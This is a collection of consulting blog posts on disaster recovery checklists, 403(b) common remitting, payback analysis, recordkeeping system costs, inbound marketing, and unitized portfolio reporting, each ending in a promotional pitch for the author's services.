 Thus, new implementations will bake in the appropriate resilience making disaster recovery obsolete.  This will be the final step in the evolution of recovery:

Can recovery be a disaster?  Whether in a test or an actual recovery, the plan itself can be a substantial security risk.  During the process, the protected data is outside of its normal zone and subject to unexpected events as well as organized threats.  Companies go to great lengths to protect the PII (personal identifying information) within their data centers, but overlook the issues during a recovery effort.  Some are flat out unavoidable!

  • How to get data to facility?
  • How to recover licenses?
  • How to recover keys?
  • Where are passwords?
  • What happens to data after the test?
  • Were any data transmissions logged?

 

So as an executive, what can you do to do a quick stock take without hiring an expensive consultant?  Here is a handy executive checklist:

  • What constitutes a disaster?
  • Do all senior managers understand their role in the event of a disaster?
  • How will the interim business be managed?
  • How will public relations be managed?  How will staff communications be managed?
  • How will customers react?  Do they really want to pay for .9999?
  • What are the core business deliveries?  What can be performed through alternative manual means?
  • How much will downtime affect the share price and market confidence?
  • How will the recovery effort be staffed?
  • What is the resiliency of the solutions purchased?
  • What is the PII exposure during a recovery effort?

  

A checklist to see what you learned

1)      Organizations should lay out a five-year plan with a recovery time objective that is ________a. Less than two hours
b. Going to improve over time
c. The same as what you have now

2)      Of the 50% to 70% of organizations that develop IT disaster recovery plans, fewer than ____ actually test those plans.a. One quarter
b. One third
c. One half

3)      44% of disaster recovery planners polled haven’t told anybody that a DR plan exists in their organization.True
False

4)      How do current budget constraints change IT disaster recovery discussions with other parts of the business?a. They don’t — IT should proceed as it has before.
b. It makes it more important to involve other business departments.
c. It makes it less important to involve other business departments.

5)      The test of an IT disaster recovery plan came fast and furiously last year a gas and electric company, when flood waters swept over its Cedar Rapids, Iowa, territory. What technology, not touted as a big piece of the IT disaster recovery plan, came to the rescue?a. Voice over Internet Protocol
b. Desktop virtualization
c. Duplication services

6)      The recession is putting a squeeze on budgets for outsourcing disaster recovery services. As such, CIOs are turning to _________ to reduce floor space at their leased recovery sites, according to providers of IT disaster recovery services.a. Server virtualization
b. Cloud computing
c. Contract renegotiation

7)      How are companies using cloud computing for IT disaster recovery outsourcing?a. They’re increasing the number of licensees with access to DR applications.
b. They’re moving mission-critical applications to a cloud environment.
c. They’re creating carbon copies of applications.

Is your common remitter for your 403b or 457 using Excel?


Darwin 067Our teachers and other non-profit employees are able to save for their retirement in 403b or 457 plans. These plans allow the participants to pick from the widest array of investment vendors. In this case, each vendor is a separate and distinct record keeper, but the total plan is rolled up under the Common Remitter umbrella. The challenge is the dozens if not hundreds of vendors to choose from and manage.

This means the participant’s hard earned contributions are routed through the Common Remitter in order to review the salary deferrals and remit them to the correct vendor. This is a critical service to maintain the plan’s compliance and reconciliation. It is a good and necessary step to protect the participant’s interests. However, too many institutions are relying upon manual or antiquated processes which rely upon Excel spreadsheets. This creates a huge opportunity for investment delays and lost money.

It is challenging to know exactly how your plan is being managed. But here are some tell-tale signs your remittances are being handled manually:

  • There is a long time delay for processing SRA changes;
  • The participant information is not accessible directly on the web;
  • There is a long time delay between deductions and the actual investment;
  • The payroll department is not using a standard electronic interface;
  • The actual deductions are not tested each payroll against the expected SRA’s;
  • There are compliance surprises at the year end;
  • The employer cannot download SRA changes online with each payroll frequency;

These problems have been allowed to infect too many processes because this industry has emerged very quickly and has not had a great deal of standards. The initial attempts at remitting were either done by local brokers or the vendors themselves as a courtesy service. However, the level of complexity and accountability has grown dramatically in the past few years. Thus, a best practice has evolved to utilize an independent Common Remitter to evaluate the transactions who is not biased by any investment product.

For these Common Remitters to provide cost effective service they must deploy a quality system to manage the end to end process. This cannot be done with the typical recordkeeping system. These retail retirement systems demand to post the complete financial transaction with detail level accounting transactions. However, the common remitting process simply needs to track and evaluate the business event. Then, pass it on to the system of record for final posting.

Today’s common remitting requires a very different approach. It needs a diligent workflow tracking through varying workspaces. This is not the typical imaging workflow, but an integrated workflow directly aware of the plans and participants. Even though the balances are not maintained, the administrative plan rules must be enforced for transactions.  

The best common remitter systems used by employers for managing the multi-vendor investment providers for 403(b) plans function as an extension of the employers HR System and administer all multi-vendor benefit programs. The system will allow payroll to simply manage a single deduction. Then, the remittance system will handle the allocation instructions to the selected vendors. This dramatically reduces the payroll workload and complexity.

In the future, the participants will enter any Salary Reduction Agreements (SRAs) directly on the common remitter website. The online process will immediately evaluate the request to insure the vendors selected are approved and the amounts are within the plan ranges. This eliminates the most common back office processing errors. Then, the common remitter system will allow the HR system to download changes on a payroll basis in order to dramatically reduce the lag time for participant changes. This not only provides a better service to the hardworking employees, but also reduces the workload on the HR department.

Then, the HR system will update the Common Remitter with each payroll run. The payroll system will provide a standard SPARK interface. It is not efficient to require the common remitter to manually reformat local files. The new standard interface will show the participant information and the deductions. The upload will be done on the web to allow immediate validation and feedback. This allows the HR team to immediately fix any problems. This sometimes appears as more work on the HR, but it is actually less. It is less work because any required adjustment may only be done by HR; but in this case, it eliminates the manual iterations with the Common Remitter back office.

After review and processing, the deductions are routed to the approved vendors. The Common Remitter will route the contribution transactions on to the vendor either in an XML SPARK format or in the native downstream record keeper format. All transactions and cash will be delivered electronically. This practice significantly reduces the risk and cost for the vendor.

Take a closer look at your Common Remitter process. If you are a participant and you see any of the warning signs, then your contributions may be being manually tracked on spreadsheets. If you are on the HR team and you want to reduce your ever increasing HR effort, you need to demand your remitting agent deploy a quality system designed for this process. For the best interest of your employees, you may need to work with your remitter to agree on a standard format. If you are a vendor and are overwhelmed with inbound files, then work with your agents to take advantage of systems which will allow straight through processing.

Follow us to see the latest development for common remitting.

Beware of the Payback Analysis Mote Dragons


Ayers RockThe beginning of any project is like planning to lay siege to a castle.  The business must take advantage of proven tools to evaluate the risks against the rewards.  Losing a battalion of soldiers to take a castle for only a few trinkets and beads is certainly not a sustainable model.  And will likely get you killed or far worse: fired!  The need to evaluate initiatives in business is just as critical as the outcomes can dramatically impact the livelihoods of your team members.  The projects you will approve range from large initiatives into new lands (new products) to smaller endeavors as simple as rebuilding the castle walls (system upgrades).  Obviously, the projects with larger spends, greater risk, and higher potential impacts will require greater scrutiny than smaller projects.  The key in developing a strategy on  how to successful traverse the analysis draw bridges is not only to know what types of evaluation gates are available, but also understand the mote dragons lurking beneath each gate. 

 

Gathering Intelligence

The first and most important step is to gather some intelligence about your team, the environment, and of course, the enemy.  Intelligence about the future is seldom perfect unless you have a resident wizard.  So be prepared to make some reasonable estimates.  The data you assemble will form the foundation of the decision process so also expect to invest more time in preparing it than analyzing it.  A good white knight or PMO will assemble the following items:

  • A reasonable estimate of the initial and on-going costs to initiate, deliver, and maintain the project deliverables.  Projects often underestimate the on-going support costs because the PMO is not familiar with the business domain.
  • A reasonable projection of revenue as a result of the project deliverable.  This must be in terms of the business as a whole rather than any one department or fiefdom.  A wise PMO will avoid the temptation to use internal cross-department charges or recharacterize internal benefits as departmental “revenues”.
  • An assessment of the impact of taxation.  This will either require the input of the CFO or a local sorcerer.
  • The discount rate to account for the time value of money.  This can simply be a mutually agreed representation of the rate between the current borrowing rate and the opportunity costs of other uses.  It will not be possible to be exact so close is sufficient.
  •  Strategic directions of the business.  This requires understanding how to connect the dots to get to the business’ long-term market position.  Taking the river valley may not be cost effective in itself, but it is critical if it allows you to conquer the downstream kingdom of gold.

 

Secret Bag of Tricks

The next step is to understand the 3 most common tools available in your secret PMO bag of potions.  These mystical tools require forming a view as to the evaluation period as well as the project deliverable life:  these are not the same.  The most common evaluation period is usually 3 years which is driven by the royal court’s bonus plans or corporate public reporting.  We start with payback period,” says Ron Fijalkowski, CIO at Strategic Distribution Inc. in Bensalem, Pa.  “For sure, if the payback period is over 36 months, it’s not going to get approved. But our rule of thumb is we’d like to see 24 months.” (1)   So let’s open our bag of tricks and see what we have to work with: 

 

Gate 1:  Return on investment Exhibit 1:  Return on Investment

 Return on investment (ROI) is calculated by subtracting the project costs from the benefits and then dividing by the costs.  The higher the return is on the investment the better.   The accountants show it as ROI = (total discounted benefits – total discounted costs) / total discounted costs.  However, this method does not address the rate at which the benefits are recovered.  It assumes the recovery rate is level.  Thus, a project which has a larger % of the recovery early is weighted the same as project which recovers the investment later in the evaluation period.  A good online calculator can be found at http://www.money-zine.com/Calculators/Investment-Calculators/Payback-Calculator/

 

 

Gate 2: Payback AnalysisPayback Analysis

In simple terms, this is the time required for the additional booty to pay back the King for the amount they spent to initiate, build, and maintain the deliverable.  A common way to show this is to plot the cumulative costs and revenue on a graph.   See the example of 2 projects (P1 and P2) with the same total spend, but very different payback rates.  The data points must show the cumulative amounts (in present dollars) and not the amounts for each period.   The intersection of the graph lines will show the payback timeframe on the X-axis.  “Payback period is the most widely used measure for evaluating potential investments.”(1)  “Payback gives you an answer that tells you a bit about the beginning stage of a project, but it doesn’t tell you much about the full lifetime of the project,” says Chris Gardner, a co-founder of iValue LLC, an IT valuation consultancy in Barrington, Ill (1).”  A sample cost benefit analysis template can be found at http://jaxworks.com/payback%20Analysis.xls

 

 

 Gate 3:  Net present valueNet Present Value

Once the King’s advisers have the data for the payback analysis, the next step is to discount it for time.  “Net present value (NPV) analysis is a method of calculating the expected net monetary gain or loss from a project by discounting all expected future cash inflows and outflows to the present point in time (4).”  The evaluation simply incorporates a declining factor for each period.  The higher the net present value the better.  In this case, both projects (P1 and P2) have the same revenue and payback period.  However, once the booty is discounted for taxes, interest, and inflation, the revenue on Project 2 looks more attractive.  Thus, this tool takes into consideration the rate of the recovery by discounting rewards gained later in the deliverable life.  A sample template can be found at  http://www.engage-consulting.biz/docs/cbatemplate.xls

 

  

 Payback Analysis Traps 

 Now we have accepted our noble quest and we understand the tools available, we must heed the warnings of the wise sage.   It is not just critical to know what the tools show, but also what they don’t show.  Many PMOs have fallen victim to the following payback analysis traps:

·        The PMO attempts to do the payback analysis within an industry and customer base they really don’t understand.  The best payback analysis is done by core management team familiar with the business.

·        The false belief the estimated and often intangible benefits will actually materialize with any certainly.  Don’t believe your own propaganda. Clever estimates can usually swing the project analysis either to the good or bad.  Spend more time validating the estimates than taking comfort in the analysis results.

·        The failure to consider the big picture revenue and value of strategic leverage.  The analysis tools don’t consider the long-term strategic benefits for the business.  The crystal ball cannot connect the dots because it ignores financial performance after the break-even point (outside of the evaluation period).  Many times the life of the project deliverable is much more durable and will provide revenue or benefits much longer than 3 years.  The pitfall is that many companies pass on projects that would generate millions of dollars of recurring revenue over the long run simply because the immediate payback does not meet some arbitrary PMO metric.

·        The creation of fictitious fiefdoms in order to assert creative attempts to quantify internal benefits as departmental revenue.  The IT group is not a profit center.  The focus must remain on the business.

·        The models tend to give the PMO the appearance of too much power.  This can become a distraction as the PMO is not usually familiar with the domain or the business.

·        Resting comfortable in the robes of your analysis if the project fails the tests.  Often a second look is often necessary to avoid having spreadsheets eclipsing the bigger picture.  Many of the great new ideas like storing music on thumb drives or building desktop computers in bright color might have failed these short-term tests. 

 

As you plan your next project whether it is charging into new lands to conquer or simple patching a few crumbling walls, the team must be comfortable using the payback analysis tools in their bag of tricks.  However, the royal PMO must take care to avoid the common pitfalls or they will be devoured by the mote dragons before they even get near the gates to the castle.  

See how our consulting services can help you today.

 


 

Resources

(1)    http://www.computerworld.com/s/article/78529/ROI_Guide_Payback_Period?taxonomyId=074

(2)    http://cbdd.wsu.edu/kewlcontent/cdoutput/TR505r/page15.htm

(3)    http://www.mindtools.com/pages/article/newTED_08.htm

(4)    http://mydeskdrawer.com/projectmanagement/financial.html

(5)    http://coen.boisestate.edu/mkhanal/present.htm

(6)    http://web.ccsu.edu/business/faculty/petkovao/mis460prmgt/lectures/ch4%20fin%20analysis.htm

(7)    http://downloads.techrepublic.com.com/5138-6321-729928.html

(8)    http://jobfunctions.bnet.com/abstract.aspx?assetid=729928&node=6321&docid=313413&promo=100511

Why your recordkeeping system is costing you!


Trent2You work hard and try to put away a few dollars for retirement.  Then, there are the fees the plan charges trying to erode your benefits – some you see and some you don’t.  Why does it cost so much to handle a simple account?  After all, my checking account is free.  Why can’t my 401(k) be free too?

The cost nobody is talking about is buried in the system itself.  The traditional recordkeeping system was born to do a narrow set of accounting transactions. The systems were designed to be held deep in the back office as the plan was managed by a trustee or advisor. The system tracked participant balances and added contributions. The participant interactions were few, simple, and heavily reviewed by administrators. These tried and true systems were successful at processing and tracking simple accounting transactions.

But, regardless of the database or coding language, these legacy systems are driven by a history core constructed from an arbitrary technical transaction file. These are the simple accounting entries required to manage the debits and credits. The transaction constructs were designed for the expedience of programmers rather than the business because the industry was still evolving. The functionality was simple and narrow but very efficient.

However, the recordkeeping business has dramatically changed because of higher participant awareness and involvement. We now see self-direction, lifestyle portfolios, aggregate balances, ETFs, and credit card loans on the table in order to stay competitive. The participants demand to see the data in a form they can understand and interact with it with respect to meaningful life event terms. This requires a successful administrator to engage in terms of business event packages rather than simple back office accounting transactions.

However, when the legacy system is driven by the core technical transaction construct it is difficult and awkward for the system to understand the end to end process. The back office system was born to process one debit or credit at a time. In reaction, the system vendors only have 2 courses of action in the short term: wrap the accounting details with a secondary event identifier or insert bloated middleware to attempt to trick and redefine the interactions.

If an internal wrapper is used, it does allow the system to be aware of related transactions, but it struggles to interact with upstream and downstream systems. The only transactions the wrapper can understand are the internal accounting. It cannot be aware of quality control steps, business interactions, or external interface dependencies. Unfortunately, in today’s recordkeeping environment, the business process always requires more than one system to service the participant. Thus, a wrapper ultimately does little to decrease the costs of ownership or improve the business’s ability to adapt to new service offerings.

The 2nd course of action is to front-end the system with bulky workflow systems or multi-tiered middleware. These workarounds are disguised as loosely coupled add-ons to make it easier to work with the aging host system. But what they inevitably insert into the process is duplication of data and/or rules. This not only makes it challenging to get to the source of truth, but also to diagnose any issues. There have been many cases of administrators acting upon the results they see in the bolt-on workaround when the actual data residing in the core accounting system tells a different story. The temptation is for these workarounds to do too much and really not understand the processing engine. This approach will provide some short-term relief, but inevitably drives the operational costs up and makes change almost impossible because of the tangled nest of code – just ask to see a process diagram in your favorite recordkeeping shop.

This explains why traditional recordkeeping systems are particularly bad at common remitting where the principle activity is workflow.  

System architects who understand the recordkeeping business recognize that the problem with today’s recordkeeping platforms is not a lack of understanding technology but a lack of understanding the business. There are no new 4 letter acronyms that can reduce the 401(k) fees for the participants. In fact, most bolt-on workarounds only increase the costs. These costs were easy to hide when the market was running high, but much more difficult in down times. Only a fresh approach to the system design can begin to provide some relief.

The system architecture must be driven by the business event or package. This must be redefined in terms of the end user rather than the software. It is not just a business service wrapping up complicated internal accounting devices, but rather an end to end process. This new comprehensive approach must include plan setup across the enterprise, contribution remittance, participant account interactions across several systems, upstream dependencies, and downstream deliverables. These key activities cannot be efficiently managed with bolt-on workarounds for things we must expect the recordkeeping system to deliver. In other words, the package must be core to the operation of the recordkeeping hub.

Each package is migrated through workspaces defined by the business flow. Packages are seldom single interactions but a series of steps. Each workspace must have a set of rules to observe and enforce. Those using the legacy systems typically have thick manual processing guides or yellow sticky notes to guide them through the maze. These are not simply status points pushed around by an external workflow, but core events managed at the heart of the business system. The package cannot be a simple wrapper or a middleware trick.

As a common history file becomes the core driver it then shows all of the packages impacting the participant. As each workspace is completed, the next generation system will update internal tables with specific data, such as plan changes, participant changes, contribution instructions, allocation instructions, or loan requests. These tables hold the specific processing results for the event much like traditional recordkeeping. However, the cost of ownership will fall dramatically because the one system at the hub managed the package from cradle to grave.

Of course, each workspace can also update external systems such as related pension recordkeeping, common remitters, vendors, or other systems. If updates are required to a back office system, the updates are done in terms of the recordkeeping system with the expectation that the pension rules will be applied and managed by the back office system. The intention is not to trick the back office system, but rather to listen closely to it.

Through this process the administrator’s actions must be carefully tracked and audited. In fact, this is the only way a transaction can be secure across the enterprise. Each workspace must have defined set of roles that can access it for review, processing, and overriding. In the traditional model, security is often has to be held within multiple applications. This means it is impossible to get a comprehensive enforcement of who viewed and acted upon a transaction. As security concerns and liability increase, the traditional model will become more and more expensive to work around.

The next generation system must inherently start with the business event. The system will be aware of the plan and participant original details, but expect to have to interact with various related systems. If you love your old legacy system, don’t worry. This paradigm doesn’t really compete with traditional recordkeeping systems. It can actually empower them. But it is time to recognize that those systems are too transactionally detailed to actually run a business. And old bulky workflow systems are too generic and image oriented to really manage specialty business lines. The workflow must have a natural understanding of plan and participant data in order to make meaningful decisions. Thus, expect to see more and more independent systems entering the market to become the central business recordkeeping system. This gives the recordkeeper more independence to pursue new service offerings. The new game is not about simple divisions between the front and back office. But rather on how to efficiently drive the business with the fewest number of systems and letting each system do what it does best. Too many shops are dying with 5-10 systems and hundreds of painful workarounds. The new business hub systems are the answer to driving down the cost of administration and letting the legacy systems keep doing what they do best.

For more details check out the new Common Remitter

Inbound Marketing with Relevant Web


Integrated Inbound Marketing

trent3It is well known that the business website is critical to generating revenue around the clock without the overhead of bricks and clerks.  But how do you attract customers to the site and keep them coming back for more?  In order to do this, you need a framework which brings to the table the best practices of using inbound marketing.  This means attracting prospects through social media, building a following through social media groups, building credibility through relevant blogs, and configuring a site which is search engine friendly to get the highest possible natural listings. 

 

SEO

 

 

 

 

SEO Optimization

In the past, businesses were found by hanging out a sign for passersby or by getting their name listed in the Yellow pages.  Businesses used tricks like neon lights or starting their business name with AAA to get noticed.  These tricks worked particularly well for plumbers, barbers, and bars.

Today, more and more customers are searching for services on the web with search engines.  The common search engines like Google, Yahoo, or Bing use cleaver algorithms to find and index web sites.  The search engines crawl websites and try to determine what the site is about, then make a copy of it, and finally index it for future reference. 

The search engines are aware that people often try to trick users as to what the site is really about so the process has gotten quite sophisticated as to how best to inventory the world of websites.  How can Google™ be sure what your site is about?  The key items the search engines look for are:

  • How frequently the site is updated – current and frequently updated information is more interesting and credible.  This means you must have a CMS which allows updating on a daily basis without the overhead of recompiles or regression testing.
  • Link tags or descriptions.  It is not the picture or the content as much has the internal description used to reference it.  In fact, search engines can’t read pictures or flash.  The wording on the tag or link is more credible than the resulting content.
  • External references back to the site.  Of course, it is interesting how you describe yourself, but what other people say is far more credible.  In order to get this, a site must inspire others to talk about on their own.  The paid link services have not proven to be successful as search engines seem to be aware of bought links as opposed to inspired linked.  Use your social media and blogs to get people talking.  The right blogger can indirectly reach over 7 million people in only a few days.
  • Key words.  These are the words your customers might use to describe your services or offerings.   They can often be very different from how you or a knowledgeable industry insider might describe your business.  The best approach is to start with determining what key words your competition is using.  You can choose to take them head on and fight for the center or you might choose to promote a new angle.   As you build your content, be aware of your focused words, but don’t force them into a sentence as it will be obvious that it is contrived and thus loses credibility.

 

In simple terms, your business must be able to rank high on the natural search results for your selected key words.  Try it often and on different search engines.  If you are not listed in the first 2 pages, you simply will not be found as people seldom go beyond the first page.  They simply expect the ‘big’ players to be listed first.  But be aware, you may not be able to ace all of the search engines, so it is best to focus on the market leader – which for now is Google.

Of course, there are paid advertisements and rankings, but these have not been proven to be effective in the long term.  A huge majority of the follow on clicks are still from the natural listings as people find these more credible.  People always believe a word of mouth recommendation over an advertisement.  However, it can be worth using some paid rankings from time to time to generate a spike of activity or to test out new key words.  But you have to be ready to monitor the results closely.

 

Social Media

The primary use of social media is to attract attention and build a loyal following.  There is no better way to target specific groups and stay in touch with a target community.  Tools like Facebook™ and LinkedIn™ allow you not only to be found by specific searches, but also to target specific self-declared groups.  However, in order to attract the attention, the topic must offer something of value – it must be relevant.  The offering in terms of advice, references, or similar must have value to the target community.  Of course, it is great if the item of value is related to the business offering, but it is not required.  For example, information on business dress casual is interesting to those who will be going on a job interview.  However, the provider must remain keenly aware that this is a social atmosphere in that any blatant commercial pitch will likely backfire.  A good way to view the conversation is to keep it light as if it were a friendly dinner party.  Nobody wants to hear an insurance pitch from the brother-in-law.

The goal is to draw the broader community into a dedicated group or page which has a similar focus or interest – not necessarily directly tied to your product.  This group or page is an effective way to both measure your prospective customer base, to get insights as to their real needs, and to communicate directly to them.  One of the best approaches to a group is to pose questions or solicit feedback on related topics.  The most successful topics are about the group’s common challenges rather than any specific product.  How do you research a prospective employer?  What are challenges around the house when you are unemployed?  This will not only provide valuable insight as to what services are most desirable, but also establish your brand as the industry authority.  Most people eagerly engage with people who solicit their opinion and provide feedback so that it shows their voice was heard.  It doesn’t have to be personal feedback, but simply a summary response or a broadcast thank you.

However, the group or page is not an effective place to deliver premium content or drive revenue.  It is best reserved for discussion and updates.  The prospects can comment without any fear of commitment.  It is like looking in a store window.  While the prospect is outside, they will often compare notes with other prospects.  But the business owner seldom gets to eavesdrop to the extent provided in social media.   Some businesses worry about letting their customers talk freely in public; however, even negative comments can be turned into good will if the business responds appropriately.  All too often negative comments are public, but the business response is private or edited.  In this case, both are public and in the author’s own words.  The goal is really to build curiosity into the business’ core web site.  Then, we get them to come inside – where hopefully you already know what they think.  So, the landing page can continue the process to convert them to a registered prospect so they can get more tailored communication and maybe even some free stuff.


Blogs

Unless your business is the absolute bottom line discounter, you must build credibility for your purpose, expertise, and content.  Customers like to go to the recognized source – and will pay a premium for it.  A blog is becoming the preeminent method for achieving a broad readership and following.  These are short articles establishing a position or recommendation on a topic of interest to the target community.  These are not product advertisements or rants, but short articles usually based upon a lifetime of knowledge and experience.  They must deliver valuable content to the reader and not just refer the reader to a paid service. 

It is amazing how much relevant information business have on the shelves.  This information can be found hidden away in their minds or on their bookshelves.  A common mistake is to restrict the blogging to only senior approved staff.  In reality, some of the riches blogs come from experienced staff on the front lines.  A wealth of rich content can be found in prior works or just life experience that does not require a huge effort to publish.  The best blogs are only a few paragraphs so sometimes an existing work can generate several blog entries over several weeks.  Some examples of existing information which can be recycled:

  • Existing general works can be edited down to one key point.
  • Custom work can be generalized to fit a broader audience
  • Staff experience can be tapped for life experience
  • Speeches can be captured to video
  • Slide shows generalized and shortened.

 

The blog not only establishes your credibility, but it also drives your SEO authority because each blog page itself is viewed as a website.  This means after providing some unique and valuable nuggets, it is advantageous to always refer the reader back to the core site for additional information.  Of course, the links must carefully use the appropriate tags to describe what will found within the referenced landing page.  This is a key way to increase the SEO authority of your home domain while at the same time developing a loyal prospect base.

 


Landing Page

Now that we have a prospect interested, where do we send them?  The recommended process is to direct prospects to a specifically designed Landing Page.  A business may have several Landing Pages for different lines of business or target customer groups.  A common mistake is to direct prospects to the home page which is by necessity a hub which is a one size fits none.  Chances are your business offers several products, but this prospect came only because of an interest in one!  Don’t put all of your toys on the table and ask them to pick.  By contrast, the Landing Page has a specific focus and a call to action.  It shows clearly what the business is offering this prospect and what you are asking the prospect to do – Subscribe to our newsletter!  At this point, it is a best practice to offer some free service with a minimal obligation.  Some examples:

  • Newsletter
  • Resume review or preparation
  • Job search questionnaire
  • Interview quiz
  • White papers

 

The most successful teasers do not necessarily require any upfront registration or credit cards.  These barriers will dramatically increase the bounce rate before the prospect has even tried your service.  It seldom works on the street to ask someone their SSN before at least getting some agreement on the weather and the latest sports game.  Remember, your competition is only one click away.  The better approach is to ask for the registration after the prospect has consumed the free item.  Then, you not only have their information, but you also have a more committed prospect.  They agreed to register after they digested your information; this avoids wasting a lot of time following up with cold leads.

 

 

 

 

 


CRM

After a business has pulled in new prospects with high search engine listings and kept their interest in social media, the business must convert these prospects into customers.  This process must use a light touch and be easy to use.  It must allow the customer to have control over their account and be comfortable that they can unsubscribe at any time.

This tool enables the business to directly communicate with their subscribers with content that is tailored directly to their situation or needs.  The information can be delivered with tailored screens, tailored newsletters, and/or advertising.  General messages are rapidly becoming as in effective as billboards.  Registered prospects expect you to know them and to give them the respect they deserve by only giving them what they need to know.  It is unproductive to explain how to fill out a resume at McDonalds when your customer only wants CIO positions.

This database will become your businesses most important resource.  It will be used as an initial pool for seminars and book sales.  The CRM system can’t be something you sit on the sideline.  It must be integrated into your web engine and complete plan.  The settings must understand privacy preferences and security restrictions.   The best practices leverage the CRM for:

  • Self-managed personal accounts for automatic follow up and repeat customer tracking
  • Tracking multiple addresses, including security and status designations
  • Attach customers to business-oriented groups with a lifecycle status history tracking
  • Send targeted email messages or publish online directories (by groups)
  • Export lists for mailings or perform mass email messaging
  • Leverage relationships between customers and businesses or between family customers
  • Track and leverage the status history of each customer by product or opportunity

 Now, you are online and ready to go with your e-business.  But check out the inbound marketing ready web framework.

How to Unitize and keep Uncle Sam happy


Trent paddling down under

Trent paddling down under

1) Do the 22c regulations apply to rebalancing activities?

As you probably know, these 22c rules are intended to identify and stop too frequent participant trading.  These rules focus on investment movements directed by the participants.

Throughout the year, mutual funds will send electronic requests for clarification on trades to plan administrators. These are usually in response to unusual amounts or suspicious timing.  The plan has an obligation to respond within a short time window.  All can be done electronically, if the right systems are in place – but the system must make the right response based upon the information it knows.

The advantage with portfolios is that most of the trades are as a result of investment manager instructions for rebalancing.  The contribution splits are done by the prescribed ratios.  The withdrawals are done by the prescribed formulas.  And any transfers internal to the portfolio for rebalancing whether on a daily basis or other frequency, are being done at the adviser’s standing instructions.  These actions are not being done by the participant – but by the plan.

However, the only remaining participant activity is entering and exiting the portfolio.  This process must be managed by the recordkeeping system to insure that it is adequately controlled to limit market timing.  However, the fact that the portfolio is made up of several investments makes it more difficult if not impossible to take advantage of market blips.

There is some confusion here because of the workarounds many shops had to use to accommodate portfolios because of limitations in recordkeeping systems.  A common workaround placed each underlying investment at the participant level; and then used allocation ‘package’s to manipulate the investment.  Thus, the contribution, withdrawal, and rebalancing activities generate participant level history and activity.  This not only creates unnecessary overhead on the recordkeeping system, but it actually creates a false view of 22c activities.  It makes it difficult to determine what is at the participant direction and what is really at the direction of plan (advisor) direction.  Unfortunately, all falsely appear to be participant activity.

Based upon our review with a reputable legal firm familiar with 22c, we believe that all the investment activities for the underlying investments come under the watchful eye of 22c.  However, we believe most investment houses will relax the scrutiny if the recordkeeper explains that the funds are used in a plan managed portfolio.  This means that the answer to most every query will be that there are no participants involved and it is a result of plan actions.  This is particularly compelling if the plan can show adequate controls limiting participants in and out of the portfolio as a whole.  However, this approach is cleaner if the underlying investment is solely used by the portfolio; if the same asset is still required by the plan for individual investment, a subaccount may be a good strategy.

 

 

2) How do the portfolio dividends get reported on the 5500?

Where the underlying investments are held on the recordkeeping system, the administrator must also manage and track the dividends for EACH investment.  This is a complex and expensive process, particularly if it is done at the participant level.  However, it makes the dividend information available for the standard 5500 interfaces from the recordkeeping system.

In other cases, the investment dividends are not reportable because of the asset wrapper.  In the case of a collective trust or a mutual fund, the underlying dividends are not reportable because they are wrapped into the asset as a whole.  Of course, these assets have their own regulations and reporting requirements – which also often mean additional cost.  Unfortunately, this exception does not apply to a unitized portfolio.

In the case of a unitized portfolio, the dividends are baked into the price each day.  They are accrued to provide for as accurate and level valuation as possible.  In fact, there is no way to do it more equitably and as efficiently.  The expected dividends are tracked and reconciled against the actual dividends posted.  But, the only investment earnings type the plan sees is appreciation (or depreciation).

Yes, the recordkeeping system is only aware of the price.  This is a substantial advantage to providing accurate and simple participant accounting throughout the year.  It avoids pushing dividend accounting down to the participant level which makes all activities easier and cleaner, but particularly reversals.  All the dividend account is done at a global level.  So, the recordkeeping system is not aware of the dividend information to pass on to the 5500.

Based upon our review with a reputable legal firm familiar with 5500 reporting, we understand investment dividends for the underlying investments within a portfolio must be reported through to the 5500.  No problem, the recordkeeping system will simply provide the interface to the 5500 tool as is.  Then, the UnitZxchange tool will provide a plan level report showing the summary of dividends for the year.  The dividend amount is then put into the proper line on the 5500 and the appreciation is adjusted accordingly.  In order to automate this process, unitZXchange can provide an interface to update a user defined field in the recordkeeping system, and this can be mapped into the 5500 interface.  This means you have the comfort of knowing the required information is closely tracked and readily available.  And the advantages of managing the dividends at the global level more than outweigh the annual adjustment of one figure on the 5500 (which can also be automated).

Check out www.UnitZxchange.com for more details.